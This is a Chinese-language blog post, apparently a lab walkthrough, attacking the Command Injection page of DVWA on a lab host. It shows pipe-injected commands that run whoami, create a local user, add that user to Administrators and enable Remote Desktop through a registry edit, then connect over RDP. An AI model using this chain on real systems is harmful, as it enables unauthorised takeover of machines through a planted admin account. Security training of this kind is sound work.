命令注入攻擊
命令注入攻擊
攻擊目標同上一篇 http://10.10.10.16/dvwa
檢視 Command Injection 輸入 127.0.0.1 如下
可以看到目標主機執行 ping 127.0.0.1 的結果輸出在頁面
可以得知該欄位輸入後會執行 ping [參數],表示是一個 command line 的執行連結
透過 command line 後面輸入 | 執行其他命令的方式來達到額外指令的方式
測試 | whoami 的指令可以執行成功如下,確認欄位沒有進行輸入驗證
先於目標主機創建一個帳號名稱為 chep
指令 | net user cehp /add,使用者成功創建如下圖
成功創建後查看使用者列表,指令 : | net user,確定使用者帳號 cehp 存在
將使用者帳號 cehp 加入到本機的 Administrators 群組
指令 : | net localgroup Administrators cehp /add,成功執行如下
接著一樣檢查本機 Administrators 群組成員
指令 : | net localgroup Administrators,帳號 cehp 已隸屬本機 Administrators 群組
對於 Windows 而言有帳號密碼後最簡單的方式就是透過遠端桌面連線
先查看遠端主機有否開啟 3389 RDP 遠端桌面連線
指令 : | netstat -an | findstr 3389,確認有開啟如下
直接遠端桌面 10.10.10.16 成功連線
如果目標主機沒有開啟遠端桌面連線服務的話,檢查後沒有 3389 RDP 服務
先測試遠端桌面連線,確定失敗(廢話,沒服務可以連才有鬼)
那就直接透過下列指令直接幫他開起遠端桌面服務即可
指令 : | reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
再 | netstat -an 一次可以看到服務已經開啟












留言
張貼留言